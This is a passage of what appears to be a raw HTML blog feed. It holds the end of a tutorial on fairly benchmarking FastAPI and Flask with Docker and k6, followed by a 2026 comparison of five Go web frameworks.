class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">hello world</span><span class="sh">"</span><span class="p">})</span> </code></pre> </div> <p>You can do the same in Node.js, Go, or Java, just keep the endpoint functionally identical.</p> <p>Optional: add a sleep route to simulate I/O/concurrent load.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4gs8v8o44ne05mdos4uq.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4gs8v8o44ne05mdos4uq.png" alt="Mahdi Shamlou" width="800" height="533"></a></p> <h2> Step 3 — Dockerize Your Frameworks </h2> <p>Here’s a funny story:</p> <p>At first, I ran FastAPI with just uvicorn… and I thought “Yeah, this will do.” But then I realized 🤦‍♂️</p> <blockquote> <p>If I run Flask with Gunicorn and FastAPI with Uvicorn alone, it’s like comparing a Ferrari to a bicycle… not fair! just fun!</p> </blockquote> <p>So I fixed it: FastAPI + Gunicorn + UvicornWorker and 1 worker, exactly like Flask.</p> <p>FastAPI Dockerfile (Fair Version):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight docker"><code><span class="k">FROM</span><span class="s"> python:3.11-slim</span> <span class="k">WORKDIR</span><span class="s"> /app</span> <span class="k">COPY</span><span class="s"> . .</span> <span class="k">RUN </span>pip <span class="nb">install </span>fastapi uvicorn gunicorn <span class="k">CMD</span><span class="s"> ["gunicorn", "-k", "uvicorn.workers.UvicornWorker", "-w", "1", "-b", "0.0.0.0:8000", "app:app"]</span> </code></pre> </div> <p>Flask Dockerfile:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight docker"><code><span class="k">FROM</span><span class="s"> python:3.11-slim</span> <span class="k">WORKDIR</span><span class="s"> /app</span> <span class="k">COPY</span><span class="s"> . .</span> <span class="k">RUN </span>pip <span class="nb">install </span>flask gunicorn <span class="k">CMD</span><span class="s"> ["gunicorn", "-w", "1", "-b", "0.0.0.0:8000", "app:app"]</span> </code></pre> </div> <blockquote> <p>✅ Now both containers have the same worker count, same CPU/memory limits — fair and square!</p> </blockquote> <h2> Step 4 — k6 Load Testing </h2> <p>k6 scripts for each framework:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="k">import</span> <span class="nx">http</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">k6/http</span><span class="dl">"</span><span class="p">;</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">sleep</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">k6</span><span class="dl">"</span><span class="p">;</span> <span class="k">export</span> <span class="kd">const</span> <span class="nx">options</span> <span class="o">=</span> <span class="p">{</span> <span class="na">stages</span><span class="p">:</span> <span class="p">[</span> <span class="p">{</span> <span class="na">duration</span><span class="p">:</span> <span class="dl">"</span><span class="s2">30s</span><span class="dl">"</span><span class="p">,</span> <span class="na">target</span><span class="p">:</span> <span class="mi">50</span> <span class="p">},</span> <span class="c1">// ramp-up</span> <span class="p">{</span> <span class="na">duration</span><span class="p">:</span> <span class="dl">"</span><span class="s2">1m</span><span class="dl">"</span><span class="p">,</span> <span class="na">target</span><span class="p">:</span> <span class="mi">200</span> <span class="p">},</span> <span class="c1">// hold load</span> <span class="p">{</span> <span class="na">duration</span><span class="p">:</span> <span class="dl">"</span><span class="s2">30s</span><span class="dl">"</span><span class="p">,</span> <span class="na">target</span><span class="p">:</span> <span class="mi">0</span> <span class="p">},</span> <span class="c1">// ramp-down</span> <span class="p">],</span> <span class="na">thresholds</span><span class="p">:</span> <span class="p">{</span> <span class="dl">"</span><span class="s2">http_req_duration</span><span class="dl">"</span><span class="p">:</span> <span class="p">[</span><span class="dl">"</span><span class="s2">p(95)&lt;200</span><span class="dl">"</span><span class="p">],</span> <span class="c1">// 95% of requests should be &lt;200ms</span> <span class="p">},</span> <span class="p">};</span> <span class="k">export</span> <span class="k">default</span> <span class="nf">function </span><span class="p">()</span> <span class="p">{</span> <span class="nx">http</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">"</span><span class="s2">http://localhost:8001/hello</span><span class="dl">"</span><span class="p">);</span> <span class="nf">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="p">}</span> </code></pre> </div> <p>Run and save results:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">mkdir</span> <span class="nt">-p</span> results k6 run <span class="nt">--out</span> <span class="nv">json</span><span class="o">=</span>results/framework1.json k6-tests/framework1.js k6 run <span class="nt">--out</span> <span class="nv">json</span><span class="o">=</span>results/framework2.json k6-tests/framework2.js </code></pre> </div> <blockquote> <p>Works for any language/framework, not just Python.</p> </blockquote> <h2> Step 5 — Analyze Metrics </h2> <p>With Python + matplotlib (or any plotting tool):</p> <ul> <li>Average latency</li> <li>P95 latency</li> <li>Requests/sec</li> <li>Failure rate </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">json</span><span class="p">,</span> <span class="n">numpy</span> <span class="k">as</span> <span class="n">np</span><span class="p">,</span> <span class="n">matplotlib</span><span class="p">.</span><span class="n">pyplot</span> <span class="k">as</span> <span class="n">plt</span> <span class="n">files</span> <span class="o">=</span> <span class="p">{</span><span class="sh">"</span><span class="s">Framework1</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">results/framework1.json</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">Framework2</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">results/framework2.json</span><span class="sh">"</span><span class="p">}</span> <span class="n">summary</span> <span class="o">=</span> <span class="p">{}</span> <span class="k">for</span> <span class="n">name</span><span class="p">,</span> <span class="nb">file</span> <span class="ow">in</span> <span class="n">files</span><span class="p">.</span><span class="nf">items</span><span class="p">():</span> <span class="n">durations</span><span class="p">,</span> <span class="n">fails</span><span class="p">,</span> <span class="n">total</span> <span class="o">=</span> <span class="p">[],</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span> <span class="k">with</span> <span class="nf">open</span><span class="p">(</span><span class="nb">file</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">f</span><span class="p">:</span> <span class="n">obj</span> <span class="o">=</span> <span class="n">json</span><span class="p">.</span><span class="nf">loads</span><span class="p">(</span><span class="n">line</span><span class="p">)</span> <span class="k">if</span> <span class="n">obj</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">type</span><span class="sh">"</span><span class="p">)</span><span class="o">==</span><span class="sh">"</span><span class="s">Point</span><span class="sh">"</span><span class="p">:</span> <span class="k">if</span> <span class="n">obj</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">metric</span><span class="sh">"</span><span class="p">)</span><span class="o">==</span><span class="sh">"</span><span class="s">http_req_duration</span><span class="sh">"</span><span class="p">:</span> <span class="n">durations</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">obj</span><span class="p">[</span><span class="sh">"</span><span class="s">data</span><span class="sh">"</span><span class="p">][</span><span class="sh">"</span><span class="s">value</span><span class="sh">"</span><span class="p">])</span> <span class="k">if</span> <span class="n">obj</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">metric</span><span class="sh">"</span><span class="p">)</span><span class="o">==</span><span class="sh">"</span><span class="s">http_req_failed</span><span class="sh">"</span><span class="p">:</span> <span class="n">fails</span><span class="o">+=</span><span class="n">obj</span><span class="p">[</span><span class="sh">"</span><span class="s">data</span><span class="sh">"</span><span class="p">][</span><span class="sh">"</span><span class="s">value</span><span class="sh">"</span><span class="p">];</span> <span class="n">total</span><span class="o">+=</span><span class="mi">1</span> <span class="k">if</span> <span class="n">durations</span><span class="p">:</span> <span class="n">summary</span><span class="p">[</span><span class="n">name</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="sh">"</span><span class="s">avg</span><span class="sh">"</span><span class="p">:</span> <span class="n">np</span><span class="p">.</span><span class="nf">mean</span><span class="p">(</span><span class="n">durations</span><span class="p">),</span> <span class="sh">"</span><span class="s">p95</span><span class="sh">"</span><span class="p">:</span> <span class="n">np</span><span class="p">.</span><span class="nf">percentile</span><span class="p">(</span><span class="n">durations</span><span class="p">,</span><span class="mi">95</span><span class="p">),</span> <span class="sh">"</span><span class="s">requests</span><span class="sh">"</span><span class="p">:</span> <span class="nf">len</span><span class="p">(</span><span class="n">durations</span><span class="p">),</span> <span class="sh">"</span><span class="s">fail_rate</span><span class="sh">"</span><span class="p">:</span> <span class="n">fails</span><span class="o">/</span><span class="n">total</span> <span class="k">if</span> <span class="n">total</span> <span class="k">else</span> <span class="mi">0</span><span class="p">}</span> <span class="nf">print</span><span class="p">(</span><span class="n">summary</span><span class="p">)</span> <span class="n">plt</span><span class="p">.</span><span class="nf">bar</span><span class="p">(</span><span class="n">summary</span><span class="p">.</span><span class="nf">keys</span><span class="p">(),</span> <span class="p">[</span><span class="n">summary</span><span class="p">[</span><span class="n">n</span><span class="p">][</span><span class="sh">"</span><span class="s">avg</span><span class="sh">"</span><span class="p">]</span> <span class="k">for</span> <span class="n">n</span> <span class="ow">in</span> <span class="n">summary</span><span class="p">])</span> <span class="n">plt</span><span class="p">.</span><span class="nf">title</span><span class="p">(</span><span class="sh">"</span><span class="s">Average Response Time (ms)</span><span class="sh">"</span><span class="p">)</span> <span class="n">plt</span><span class="p">.</span><span class="nf">show</span><span class="p">()</span> </code></pre> </div> <h2> ✅ Key Lessons </h2> <ul> <li>Docker isolation → makes everything reproducible</li> <li>Worker count &amp; CPU limits → must match</li> <li>Simple routes may make Flask look faster, don’t be fooled</li> <li>Async/I/O-heavy routes → FastAPI (or other async frameworks) shine</li> <li>Always benchmark your actual workload, not just tiny examples</li> </ul> <h2> 🔹TL;DR </h2> <ul> <li>Pick frameworks → Dockerize with identical resources</li> <li>Create identical endpoints → optionally simulate I/O</li> <li>Load test with k6 → save JSON results</li> <li>Plot metrics → avg latency, P95, requests, fail rate</li> <li>Compare fairly → draw conclusions based on your workload</li> </ul> <h2> 📂 Try It Yourself </h2> <ul> <li>You can check out my repo: <a href="https://github.com/mahdi0shamlou/web_framework_benchmarks" rel="noopener noreferrer">web_framework_benchmarks</a> </li> <li>Clone it, run the Docker + k6 setup yourself</li> <li>Explore FastAPI &amp; Flask examples</li> <li>Or even contribute and add more frameworks for comparison</li> </ul> <h2> Want More? </h2> <p>If you enjoyed this deep dive, you might like my other article:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9kqemjn09mkamupsgh4v.jpeg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9kqemjn09mkamupsgh4v.jpeg" alt="Mahdi Shamlou" width="800" height="451"></a></p> <p><a href="https://dev.to/mahdi0shamlou/mahdi-shamlou-durable-workflow-engines-comparison-temporal-dbos-transact-prefect-custom-3a6a">How I Won an Algorithm Competition at University — With a Smart Trick | Mahdi Shamlou</a></p> <p>In that post, I share a clever approach that helped me solve tricky algorithm problems efficiently — a real-life example of strategy + code. 🚀</p> <p>🔗 LinkedIn:<br> <a href="https://www.linkedin.com/in/mahdi-shamlou-3b52b8278" rel="noopener noreferrer">https://www.linkedin.com/in/mahdi-shamlou-3b52b8278</a></p> <p>📱 Telegram:<br> <a href="https://telegram.me/mahdi0shamlou" rel="noopener noreferrer">https://telegram.me/mahdi0shamlou</a></p> <p>📸 Instagram:<br> <a href="https://www.instagram.com/mahdi0shamlou/" rel="noopener noreferrer">https://www.instagram.com/mahdi0shamlou/</a></p> <p>Author: Mahdi Shamlou | مهدی شاملو</p> webdev ai programming benchmark Go Web Frameworks Comparison 2026 — Top 5 Picks: Gin, Fiber, Echo, Chi & Beego | Mahdi Shamlou Mahdi SHamlou | مهدی شاملو Fri, 20 Feb 2026 08:19:49 +0000 https://dev.to/mahdi0shamlou/go-web-frameworks-comparison-2026-top-5-picks-gin-fiber-echo-chi-beego-mahdi-shamlo-57d4 https://dev.to/mahdi0shamlou/go-web-frameworks-comparison-2026-top-5-picks-gin-fiber-echo-chi-beego-mahdi-shamlo-57d4 <p>Hey everyone! Mahdi Shamlou here again 👋</p> <p>After my article on <a href="https://dev.to/mahdi0shamlou/mahdi-shamlou-durable-workflow-engines-comparison-temporal-dbos-transact-prefect-custom-3a6a">durable workflow engines in Python</a>, I wanted to explore something new: <strong>modern Go web frameworks</strong>.</p> <p>I searched online and honestly… most articles were old, incomplete, or clearly biased to one framework</p> <p>So I decided to write a fresh, practical comparison for 2026 with real benchmark sources and real developer experience.</p> <p>Let’s go 👇</p> <h2> Why Go for Web Development? </h2> <p>Go became super popular for backend APIs because it gives you:</p> <ul> <li>Very high performance (compiled language)</li> <li>Easy concurrency with goroutines </li> <li>Simple deployment (single binary) </li> <li>Great for microservices and cloud apps</li> </ul> <blockquote> <p>Big companies like Google, Uber, Twitch, Dropbox use Go heavily for backend services.</p> </blockquote> <h1> Top 5 Go Web Frameworks in 2026 </h1> <h2> 1. Gin — The Safe Default Choice </h2> <p>Website → <a href="https://gin-gonic.com/" rel="noopener noreferrer">https://gin-gonic.com/</a><br> GitHub → <a href="https://github.com/gin-gonic/gin" rel="noopener noreferrer">https://github.com/gin-gonic/gin</a></p> <p>Gin is probably the most used Go framework today. If you don’t know what to pick, pick Gin.</p> <p><strong>Learning speed:</strong> 1–2 days<br> <strong>Benchmark idea:</strong> ~50k–70k req/sec</p> <p><strong>Strengths 👍</strong><br> • Very easy to start<br> • Huge community and middleware<br> • Stable and production‑proven<br> • Works with standard net/http ecosystem</p> <p><strong>Trade-offs 👎</strong><br> • Not opinionated → big projects can become messy<br> • No built‑in dependency injection<br> • Some people dislike its context style</p> <h2> 2. Fiber — Express.js Style for Go </h2> <p>Website → <a href="https://gofiber.io/" rel="noopener noreferrer">https://gofiber.io/</a><br> GitHub → <a href="https://github.com/gofiber/fiber" rel="noopener noreferrer">https://github.com/gofiber/fiber</a></p> <p>Fiber feels like Express.js but written in Go. If you come from Node.js, you’ll love it.</p> <p><strong>Learning speed:</strong> 1 day<br> <strong>Benchmark idea:</strong> ~70k–110k req/sec</p> <p><strong>Strengths 👍</strong><br> • Extremely fast<br> • Very familiar for Node developers<br> • Many built‑in features<br> • Clean and simple syntax</p> <p><strong>Trade-offs 👎</strong><br> • Uses fasthttp instead of net/http<br> • Some Go libraries don’t work<br> • Debugging can be harder<br> • Smaller ecosystem than Gin</p> <h2> 3. Echo — Clean and Mature Framework </h2> <p>Website → <a href="https://echo.labstack.com/" rel="noopener noreferrer">https://echo.labstack.com/</a><br> GitHub → <a href="https://github.com/labstack/echo" rel="noopener noreferrer">https://github.com/labstack/echo</a></p> <p>Echo is like the balanced framework. Not too small, not too big.</p> <p><strong>Learning speed:</strong> 2–3 days<br> <strong>Benchmark idea:</strong> ~50k–65k req/sec</p> <p><strong>Strengths 👍</strong><br> • Clean structure<br> • Built‑in validation and middleware<br> • Good documentation<br> • Mature and stable</p> <p><strong>Trade-offs 👎</strong><br> • Smaller ecosystem than Gin<br> • Some advanced features need extra libraries<br> • Not as fast as Fiber</p> <h2> 4. Chi — Lightweight Router for Clean Architecture </h2> <p>Website → <a href="https://go-chi.io/" rel="noopener noreferrer">https://go-chi.io/</a><br> GitHub → <a href="https://github.com/go-chi/chi" rel="noopener noreferrer">https://github.com/go-chi/chi</a></p> <p>Chi is not a full framework. It’s a router used in many serious microservices.</p> <p><strong>Learning speed:</strong> Few hours<br> <strong>Benchmark idea:</strong> ~45k–60k req/sec</p> <p><strong>Strengths 👍</strong><br> • Very lightweight<br> • Uses standard net/http<br> • Perfect for clean architecture<br> • Easy testing</p> <p><strong>Trade-offs 👎</strong><br> • Not beginner friendly<br> • You must build everything yourself<br> • No built‑in ORM or helpers<br> • Slower to start small projects</p> <h2> 5. Beego — Full MVC Framework </h2> <p>Website → <a href="https://beego.vip/" rel="noopener noreferrer">https://beego.vip/</a><br> GitHub → <a href="https://github.com/beego/beego" rel="noopener noreferrer">https://github.com/beego/beego</a></p> <p>Beego is like Django. It has ORM, CLI, sessions, templates.</p> <p><strong>Learning speed:</strong> 1–2 weeks<br> <strong>Benchmark idea:</strong> ~20k–40k req/sec</p> <p><strong>Strengths 👍</strong><br> • Everything built‑in<br> • Fast development for monolith apps<br> • Good CLI tools<br> • Built‑in ORM and templates</p> <p><strong>Trade-offs 👎</strong><br> • Slower performance<br> • Heavy compared to Gin or Fiber<br> • Smaller community today<br> • Not ideal for microservices</p> <h2> Where These Benchmark Numbers Come From </h2> <p>The numbers above are not random. You can verify them here:</p> <p>👉 <a href="https://www.techempower.com/benchmarks/" rel="noopener noreferrer">https://www.techempower.com/benchmarks/</a></p> <p>This is the most trusted benchmark in backend engineering. It runs frameworks on the same hardware and same workload.</p> <p>But remember ⚠️<br> Real performance depends on:<br> • database usage<br> • logging<br> • authentication<br> • payload size<br> • TLS<br> • hardware</p> <p>So always run your own benchmark. </p> <h2> My Recommendation for 2026 </h2> <p>If you are new → Start with Gin.<br> If you need max performance → Try Fiber.<br> If you want balanced structure → Use Echo.<br> If you love clean architecture → Use Chi.<br> If you want full MVC → Use Beego.</p> <p>There is no perfect framework. Pick the one that fits your team and project.</p> <h2> Want More? </h2> <p>If you enjoyed this deep dive, you might like my other article:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9kqemjn09mkamupsgh4v.jpeg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9kqemjn09mkamupsgh4v.jpeg" alt="Mahdi Shamlou" width="800" height="451"></a></p> <p><a href="https://dev.to/mahdi0shamlou/mahdi-shamlou-durable-workflow-engines-comparison-temporal-dbos-transact-prefect-custom-3a6a">How I Won an Algorithm Competition at University — With a Smart Trick | Mahdi Shamlou</a></p> <p>In that post, I share a clever approach that helped me solve tricky algorithm problems efficiently — a real-life example of strategy + code. 🚀</p> <p>🔗 LinkedIn:<br> <a href="https://www.linkedin.com/in/mahdi-shamlou-3b52b8278" rel="noopener noreferrer">https://www.linkedin.com/in/mahdi-shamlou-3b52b8278</a></p> <p>📱 Telegram:<br> <a href="https://telegram.me/mahdi0shamlou" rel="noopener noreferrer">https://telegram.me/mahdi0shamlou</a></p> <p>📸 Instagram:<br> <a href="https://www.instagram.com/mahdi0shamlou/" rel="noopener noreferrer">https://www.instagram.com/mahdi0shamlou/</a></p> <p>Author: Mahdi Shamlou | مهدی شاملو</p> go webdev programming productivity